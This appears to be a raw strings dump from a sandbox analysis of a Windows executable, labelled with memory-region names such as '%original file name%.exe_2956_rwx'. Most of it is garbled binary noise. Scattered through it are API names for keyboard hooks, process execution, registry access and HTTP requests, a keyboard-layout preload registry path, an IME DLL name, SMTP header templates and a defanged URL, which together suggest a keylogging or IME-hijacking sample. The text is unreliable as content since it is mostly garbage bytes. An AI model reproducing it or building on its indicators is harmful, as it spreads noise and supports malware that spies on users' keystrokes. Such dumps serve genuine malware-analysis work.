%D,L%DwYO!.CDI}K.VDS.TD3>&1.gsd\D0|.NitUbg%DRN}X%DP.Dn'.qDL4ifvU.ObNHDa.xi.Iw^.]DFZ#2.Vdvu.VD/u.UG(0{$@-.>.?.RT=*%u|uYuWu():3[>[$.NT7-%suQT7>"3975]4.sR)L%CH.>~x~.DWh2ÛQkC %U4$`c%XQT=.Qyu;DvM$%F.%DkVz"nZ^%D%uoa:$c%5Uv,.DBiw?.sjHr.CDc:/%u7(UDP L%FqDg`>udPlQ.cDEjMw.DmD.Jmom4E.Jc(;%u|*eD;3 A91)D?7/'=5-%DDOWQYC =%Dm_1#&.Cu%"=t%D}3dEnumChildWindowsScaleViewportExtExSetViewportExtExWinExecGetWindowsDirectoryAQsdfdg.dll2@{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}09/27/12Windowsimm32.dllKeyboard LayoutKeyboard Layout\Preload.comment {color:green}%d&&'12345678900003333deflate 1.1.3 Copyright 1995-1998 Jean-loup Gaillyinflate 1.1.3 Copyright 1995-1998 Mark AdlerF%D,3%*.*fCNotSupportedExceptioncommctrl_DragListMsgAfx:%x:%x:%x:%x:%xAfx:%x:%xCOMCTL32.DLLCCmdTargetMSWHEEL_ROLLMSG__MSVCRT_HEAP_SELECTBroken pipeInappropriate I/O control operationOperation not permittedTiphlpapi.dllMPR.dlli1p.vqWSOCK32.dll.PAVCException@@Shell32.dllMpr.dllAdvapi32.dll(&07-034/)7 '?? / %d]%d / %d].PAVCFileException@@: %d](*.*)|*.*||(*.WAV;*.MID)|*.WAV;*.MID|WAV(*.WAV)|*.WAV|MIDI(*.MID)|*.MID|(*.txt)|*.txt|(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG(*.JPG)|*.JPG|PNG(*.PNG)|*.PNG|BMP(*.BMP)|*.BMP|GIF(*.GIF)|*.GIF|(*.ICO)|*.ICO|(*.CUR)|*.CUR|%s:%dwindows.PAVCNotSupportedException@@out.prn(*.prn)|*.prn|%d.%d%d/%d1.6.9unsupported zlib versionpng_read_image: unsupported transformation%d / %dBogus message code %dlibpng error: %slibpng warning: %s1.1.3bad keywordlibpng does not support gamma background rgb_to_grayPalette is NULL in indexed image(%d-%d):%ld%cUSER32.DLLhXXp://VVV.baidu.comMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)HTTP/1.0%sReply-To: %sFrom: %sTo: %sSubject: %sDate: %sCc: %s%a, %d %b %Y %H:%M:%SSMTPY%dX%dHeight%dWidth%dRECT(%d, %d)-(%d, %d)Styles0xXControl ID%dHandle0xX
%s |
burlywood
\winhlp32.exe
(*.htm;*.html)|*.htm;*.html
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÃ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
N.Jxd
*.JxbF
InternetCrackUrlA
u$B79%C
=.nCPgb
a.GTYOE
I%sbBW
msGT
pT.LZ
.DT-u
{QqÑT
YV-B}T
^x.WXZ
.7.:.%.0.
m.HS@E^
'.EXB
L\~.XT$
T.bthC
T$\%X
'G_
C.hNSM
MSX
7)'
K.qR\
$.TL(
.QkgM
Fp.Tq
%SrCT
.TUn:
}X.TWt
:'_.cT
^sn2.aD
%U1l >T
$r.lO
S7%fTX
v.uGT
4Tg-L}c
Â[ T
FTpGs?(
.iTsOE
4h1%U
.AT1o
;%F?h
.Tp8r
RTeq _%U~>Y
(w]%.FNT4
eJ.TI@
%xT4)
/.Te1L
/V.QG
s.SsIW_u
c;T%X
W:\6sun2
Gl%DxB
XTWÅ“
m@.zd
r@D-n}
cRT`@
.Qz5DS
V.RE/
.kTSn
{&.FT
`~/T}þ
T.hyszl
Nl_%uTW~1
.Tu[8
%xT4Rv
^7.VT
i*T%S.6
j)u.Tnb6
.jT[hwIka
$D%UV
wC~.TL=
.EWQ9y
YcRT
Q.wQ-V}$Tn4.TD@io0sN.oT0xZ.SW.STUG@esh.Tz3T.XB.Ts\~kTY%xmJ=.Te.TLg:evK%ST*_%Fj}wd.gT'z,j.vQf%STHx.Sp-.srT:%FTP?j(g.No2q.TD.RC80v,%DTbX?.Lom'.gXc3k.yGTm.TuYU%0XT-$tCP/v~!.20%U=H%C=ZWT.SAB.cTj%6UB(PT.FUf^".TEZ=.ry$%XO]{.ac/AJ.OmxT@A.RYv.ZjTeGFTPbD3.VTg.ZTxPN%UC%D},ddZ.NT.TL4&OOQ%u0.TdnB@$VT%X%Ud_qmyaT~.Lx.ET.bZ|.TA*X2.PAL.WRhI>Cú.RwqnHJ(n.NT5-#%XfU1(z%xN.Thp*I>k.Thc.vVTc6J.pQ\Tv.tr|j.UWLC[.TOHG 7%C.GKT~)~.csvT/Q@.pV)!T@#r3TÞN.DTUKt_%D.vW]SB.PT`%.TOLn{].qTX&6.pU}57.3T%F.BbT(^.mXulFY/.Cd^"$.ej{%uTIsO.cj}TZ&M%s4yP.WkB;b].XTY%XW'O.PkUA.bS\yT7.dctYTSqL[.BTAk.vb{~T;A%dlQ.mx>(T.AvQr.xT"(s4.oTD4.WT%FhfrT8.yT[]p.fU5.Ts&9T.hL4^N$.zXPTe.rw=%DTY5/U.Ke7.kYv.Tj'>.TrC:v.RTns:bx.jT;A.wrD^.uT9Qod.TRYk.yc7.TY9TL.bVq.Wn\#oC.TwU^.RVTO-5W}%sW{ZT.qaE%T,sTw%xBS.LT,.yY]k.TSt_s.TAk0pT%s4.rYd;*T %dT.YkI,pV_W.ZX*az.aMcv2.NGc.Tk*`>W.wT.XrT%ACrT?^`exE3Ou %chyT|X.gn.VIlT}T!.Bj'.UPS;7w.pC.wT)Df.Rvb"p.PT>;T%xC`}BTKx.LZWh.tGV.wxY&jÂWso.iYtpzUT.ko[w%x".lu:T!Q.vFbtU.zUg'cu.hTwEÅ!JV.Tlot=U%S.wt(hO.JTqR>Ep'~%.vqJqU.qI@.wYQYsTP%8UCrtkA-d}T^%xmzüQ 4(%uTo>TXZi.OR[-v}4Ufc.XTsT b%U>.Iq$7T%f bk%sTwrTscRTd,F&.TUHQ;%XT%qv.MTq.%Sr7yTH.bIWW_dY0*tE.Tu%c Vc($0<.hu>xQ.IVm.se:t]U.UYS3H.raY4.qVb/m.qx-.naj,.eb4sVjU.Sn.TSi3E%C=TWQ%C/.yYk.KEY!hn%.Sp.iT::IbinTCp.TS{P*a|%d_S*-CT}aYg.OqAHFtP4J[v-Ta}ST.pZD~^%Sq%CU0S`mQ05%xhd.dOoO{T%F0/X6.LTNO7.LTk-T}BOkQT.qKSi%xWI.qx_%f}TR.orz_i>T%ua_.gZ$f.UeUP.eTuI[.kTZ.qk_P'E.StFAFeXEWB%sT6~C.LxB.nT1*?.uT34(.sT*.ZT;~1I!.UA'%UI f)7.qt!'".XI1h%U1t.oTQ0T.Oe.swDMm].Gk=.UU#lWe$%fn_.BU}5v.RT30`.NPOq:SQlfp.vI4/$.jXj.EtNT0(%F[]3t.ATa(;g{O%STC
SC
%0S[{
ZTA.UF
.OT'n
}.BeT
.xQ,4N
.qT:9{
=X;%f
i".WT
b}'"u.QT
Klk.TY5EV
F.WZ=
0aN-6}7
l.AT[
jWy%U
m|T.GM
T.Wþ
.ld:jT
.jThJ9
M0.tT
n.kTNjh
5.vRz
%4upU
H8N1.TQ
(PV.WsE
nZ.Td~
4`.TA:
%uT5(
JzT2%s
vT.gl
WMWn3-h}~
%dvWirQ
V.kUW
%DQNS
#-i.dQtCf
%UH[xs
1.pP]g
%jQ.MaS
5ý\M
t.ZT}EK5
%0XTJA{5>[
.vTeJw
).YH&s
,0.tQb
f.XT;
J2.yTHg"
Tku".XI
6.TeN
S.xoX@Twm
".YTa
qzc.oW=
.bsTmWlO5%JxT
IT.Xu$3
,.Trq
4.jTa
%sY8TQ
\.YIo
3HWc.uy
-AT}x
D.cU1
A.ULVWD
tT.kb
bUDP
UdpZ
^.uTy
To.ME
2G-e}
g.pT2
jIqXw%sT
.pnFT6&
5.QTh
42]%CT
%CZ(e
Te_%S
f.YTR5
?.kH]
FTpKu
rM/%C
|.Tw.YTAP)j.MT/Ijr.NhTT.zuP{o.TMg@c&.Xny$WD.iTWfTPE.GUW\.Ty-FMdGw.jrT;c.WEW*K.iT~`;%Ub%XqoAW-.dP2%U}zj.ETyqI1/).BT;U.qy\.iWhy!(4'U%uW"^j>.PT2ot9wNv.gPT-v}vYk.UE{PP.YUT`q;1U.mja?05i.GT..TF$IsQL.xezGlCRTp5%xT(.vS ]6T.Yk\l.eBqQ;%Xhql`Tv-S%Xpmx.iT@wo.Uk{;%XyX{AT-n}Xr.UTT.ZlhV.Ty!.qTxgi;%UWg.VW3/jf%p.txe3WT.pTDAQ$[%Uj.Qa7zV.WoZ06l$FTpHMSgTDHT.IBJWxs%FwWmSg_kSw.eT,|xQ!%xT5`5.wXOY~^.YjS%sfq%dXrm8u.vT'qp!h.Tdu{fw/.TQ@%xT3jRT.Fzv.PVANe.hLT.mzTc/.TUB^p%U~QMK.WZ|gN.mTMea%x~?;TTs%fTL.Wr!~q.dOhTB%sRb4zU.KL%PrcH%X.pHT9.OxbF$IxF$.iT8PjK.zp.TZt!H"z.TxV.XrU%b$.iU'FTpU#T%Fs8JeRT%Xt> r%xK/.TVST-m}].S.Tvo;h%XT!mC%XS9%Xg:3.Ts[;^Po.eTTi%SdwT\.LW5H%x|bv8.Tvq-H}{.jsoe&p%sT`!}.rkfV.CbHL0.TxHL0u.UU4*XSQluN-'8(@{?$uNRuN$uN.uNO _(b%x&%Ud6Cu.Ijt5B.onPl.lwz]1o-q(.BpHttpQueryInfoAInternetCanonicalizeUrlA%djNrPnRASAPI32.dllInternetOpenUrlAyb@-z}.dQ8$c.lX}w.CZS2Z.dm~3|tcpt)4%D"_.PNiPi.Xc'0Vh2}.zl\M.xwlF|.yz.vnP@01xs.lgnxZ(l.aS6H.SvvF`b7a;LÃ’.MxPUf4.VnU.etn`5#z.Mm.}OrD.XK5.uO\Hi~~a%DW8h*.vp6UDpzt.Ex73.uWX]0URLb.dg[ I.tW(jz.IL |%fZ(\.OpyP%dR UOOo.tzu.lA3"UL.Hq6G.GKPx.cW X07NZ#.yWVf.MZ07[^\%U-{L%Dtb(%XodO.tpy.PW^U1I.fx&eFiwH.ivnD.Wh5^:a9d.lZ?(ML{.Hhahb(b!O.eY`AUk.zoE=Z&,gV%X.Pnxl.rh[^.LD;3DAb!%ubd.jb_-d%X^Z.yb4Y<.fr><.mez>.EF%h%XNTyHttpSendRequestA1.0.1.10071, 0, 0, 1imedllhost09.ime1.0.0.0(*.*)%original file name%.exe_2956_rwx_0091A000_00002000:GetViewportExtExWININET.dllUnregisterHotKeyRegCloseKeyKERNEL32.dllGetWindowsDirectoryAInternetCrackUrlARegOpenKeyExABv.SCv=kAvu$B79%C%original file name%.exe_2956_rwx_00CC1000_00001000:SetViewportOrgExHttpQueryInfoACreateDialogIndirectParamASetWindowsHookExA%original file name%.exe_2956_rwx_6B583000_00162000:b$m%F.Rj$&|%s}\6b'.bgFMZ.Tkh<.dxm>:=%s-Va.GKdDa.DuKeyC%.DM%R`}4A.DLe[;%7X&s;Eh%S9W'-.DT_0Z6a.CXP,UU%.C8|%cm8JWeB{"%C,ZG-c}(&gkR.OCI#i.En%f|rIAU{/LMZWeBx7pGJ2k%sa$mÃj{eD.jU.DTkJ%Flu-J 4a.EVM~tL.Ofd:g.cOK[LOÀXy.DD9%XPk%X2Zo.Gx Wymm%C 
)k8%cmLb6uZ.JZ.aYf,.CT_2k-lÂ}KV%xH-`a.RCHTg.mI-w}N.XSt%.Cdan.Ch,`.WHGt-c}(,I.zf.eb_D5Nj.fRF"w.nW.RsP:^%Fg>n*!.Lyi.Ccp3cu.wEv.wPN[%F:o6a.wmr.wH"b!.Lum'u%.DiIRlm%CI2g|%c%S5l5.RcS_Im.wEQiRkeD.bWcm8Ã..DXF{.ji0`wV.ZU?E@J?Eô.Dpe.DLs&;b.Edy.Dp8!.zPi1z.qIvtQ.DlSrt-c}\.WA%m%1m.ISk_fr.CzAgr.fe=O0h.Uc\-Y%Fk@-l.Yx2%c|5K.fT44@$.wFX~.TkhwlG-c}\~3or=Bp.Cc;i.KM.ST.u.wEb[hExe {YZ;b.di9.DToq.Dl$"W1d=S.az)A%d.S.sK&Od:srXe%F#%D|=D.ryXU .fZCmDe%original file name%.exe_2956_rwx_6B6EF000_00001000:%.Dyy%original file name%.exe_2956_rwx_6B846000_00001000:VJ.wA EShellExecuteW